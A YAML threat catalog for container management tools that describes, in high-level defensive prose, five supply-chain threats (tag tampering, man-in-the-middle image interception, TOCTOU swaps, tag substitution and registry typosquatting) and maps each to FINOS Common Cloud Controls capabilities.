1# Container Management Tool Security Threat Catalog (ThreatCatalog).
2# Conforms to Gemara #ThreatCatalog (threatcatalog.cue); gemara-version matches schema tag.
3# Scope-specific capabilities live in capabilities.yaml (CapabilityCatalog).
4# See threat-assessment-guide.md.
5
6title: Container Management Tool Security Threat Catalog
7
8metadata:
9 id: SEC.SLAM.CM
10 type: ThreatCatalog
11 gemara-version: "1.2.0"
12 description: Threat catalog for container management tool security assessment
13 version: 1.0.0
14 author:
15 id: example
16 name: Example
17 type: Human
18 mapping-references:
19 - id: CCC
20 title: Common Cloud Controls Core
21 version: v2025.10
22 url: https://github.com/finos/common-cloud-controls/releases
23 description: |
24 Foundational repository of reusable security controls, capabilities,
25 and threat models maintained by FINOS.
26 - id: SEC.SLAM.CM.CAP
27 title: Container Management Tool Security Capability Catalog
28 version: "1.0.0"
29 url: https://example.org/catalogs/SEC.SLAM.CM-capabilities.yaml
30 description: |
31 Scope-specific capabilities (CAP01, CAP02) for this threat assessment.
32
33groups:
34 - id: SEC.SLAM.CM.FAM01
35 title: Image integrity and supply chain
36 description: |
37 Threats affecting container image retrieval, integrity, and trust.
38
39imports:
40 - reference-id: CCC
41 entries:
42 - reference-id: CCC.Core.CP29
43 remarks: Active Ingestion
44 - reference-id: CCC.Core.CP18
45 remarks: Resource Versioning
46 - reference-id: CCC.Core.CP01
47 remarks: Encryption in Transit Enabled by Default
48 - reference-id: CCC.Core.TH14
49 remarks: Older Resource Versions are Used
50 - reference-id: CCC.Core.TH02
51 remarks: Related transit / interception threat from CCC Core
52
53threats:
54 - id: SEC.SLAM.CM.THR01
55 title: Container Image Tampering or Poisoning
56 description: |
57 Attackers may replace a legitimately published image tag with a malicious image
58 by exploiting tag mutability in image registries, especially when the container
59 management tool retrieves images by tag name rather than digest. This enables
60 unauthorized access, data exfiltration, and system compromise.
61 group: SEC.SLAM.CM.FAM01
62 capabilities:
63 - reference-id: CCC
64 entries:
65 - reference-id: CCC.Core.CP29
66 - reference-id: CCC.Core.CP18
67 - reference-id: SEC.SLAM.CM.CAP
68 entries:
69 - reference-id: SEC.SLAM.CM.CAP01
70
71 - id: SEC.SLAM.CM.THR02
72 title: MITM Container Image Interception
73 description: |
74 Attackers redirect the client to an unauthorized or malicious mirror so that
75 image pulls (or other artifact downloads) fetch compromised artifacts instead
76 of the intended ones—via DNS spoofing, MITM, or compromise of resolution or
77 redirect. The client believes it is pulling from the trusted vendor but is
78 served malware or tampered images.
79 group: SEC.SLAM.CM.FAM01
80 capabilities:
81 - reference-id: CCC
82 entries:
83 - reference-id: CCC.Core.CP29
84 - reference-id: CCC.Core.CP01
85 - reference-id: SEC.SLAM.CM.CAP
86 entries:
87 - reference-id: SEC.SLAM.CM.CAP01
88 - reference-id: SEC.SLAM.CM.CAP02
89
90 - id: SEC.SLAM.CM.THR03
91 title: TOCTOU Attacks during time-of-check-time-of-use
92 description: |
93 Attackers exploit the gap between when the container management tool (or
94 pipeline) validates an image and when it is used: they modify the resource
95 after the check and before use (e.g. replacing the image in cache, swapping
96 the file on disk, or changing what a tag resolves to) so the tool runs or
97 distributes a malicious image that bypassed the check, leading to compromised
98 workloads, credential theft, or supply chain poisoning.
99 group: SEC.SLAM.CM.FAM01
100 capabilities:
101 - reference-id: CCC
102 entries:
103 - reference-id: CCC.Core.CP29
104 - reference-id: CCC.Core.CP18
105 - reference-id: SEC.SLAM.CM.CAP
106 entries:
107 - reference-id: SEC.SLAM.CM.CAP01
108 - reference-id: SEC.SLAM.CM.CAP02
109
110 - id: SEC.SLAM.CM.THR04
111 title: Supply chain compromise from tag substitution
112 description: |
113 Attackers substitute the content behind a mutable tag (e.g. "latest", "v1.0")
114 by retagging a malicious image or publishing under the same tag after the
115 legitimate one, so that consumers who pull by tag receive a malicious artifact.
116 CI/CD and deployments that use tags (rather than digests) pull the substituted
117 artifact, introducing malware, backdoors, or credential theft into the supply chain.
118 group: SEC.SLAM.CM.FAM01
119 capabilities:
120 - reference-id: CCC
121 entries:
122 - reference-id: CCC.Core.CP29
123 - reference-id: CCC.Core.CP18
124 - reference-id: SEC.SLAM.CM.CAP
125 entries:
126 - reference-id: SEC.SLAM.CM.CAP01
127 - reference-id: SEC.SLAM.CM.CAP02
128
129 - id: SEC.SLAM.CM.THR05
130 title: Container Registry Typosquatting
131 description: |
132 Attackers register container image or registry names that closely mimic
133 legitimate ones (typos, homoglyphs, character omission or transposition) so
134 that users or automation accidentally pull a malicious image instead of the
135 intended one, leading to malware, credential theft, or backdoors.
136 group: SEC.SLAM.CM.FAM01
137 capabilities:
138 - reference-id: CCC
139 entries:
140 - reference-id: CCC.Core.CP29
141 - reference-id: CCC.Core.CP18
142 - reference-id: SEC.SLAM.CM.CAP
143 entries:
144 - reference-id: SEC.SLAM.CM.CAP01
145 - reference-id: SEC.SLAM.CM.CAP02